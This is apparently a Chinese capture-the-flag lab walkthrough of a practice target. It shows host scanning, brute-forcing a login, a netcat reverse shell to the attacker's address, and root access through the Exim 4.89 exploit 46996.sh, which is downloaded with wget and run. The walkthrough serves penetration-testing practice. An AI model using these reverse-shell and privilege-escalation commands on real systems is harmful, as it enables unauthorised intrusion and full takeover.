信息搜集:
首先获取靶场ip,和之前一样。
arp-scan -l
nmap -sP 192.168.28.0/24
然后访问。
发现需要登录。
漏洞分析:
直接用bp爆破,爆破出来密码为happy,登录。
发现执行了命令,抓包。
修改命令可以执行,反弹一下shell试试。
反弹shell:
本地打开监听
nc -lvvp 9999
目标机主动连接
nc <攻击机IP> <攻击机监听的端口> -e /bin/bash
然后进入交互模式。
python -c "import pty;pty.spawn('/bin/bash')"
然后用find命令找flag。
find / -name *flag*
没有找到,可能是权限不够,suid提权。
提权:
find / -perm -u=s -type f 2>/dev/null
发现有/usr/sbin/exim4,看一下版本。
/usr/sbin/exim4 --version
Exim version 4.89。
去搜一下paylaod。
searchsploit exim 4
使用这个,本地起一个apache服务,然后将sh文件传入html页面。
systemctl start apache2.service
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html
然后在目标机器上下载payload。
wget http://192.168.28.128/46996.sh
直接下载会发现没有权限,所以说随便进入一个 有权限的目录里下载。
下载后给可执行权限。
chmod +x 46996.sh
./46996.sh
得到flag:
然后在root里得到flag。
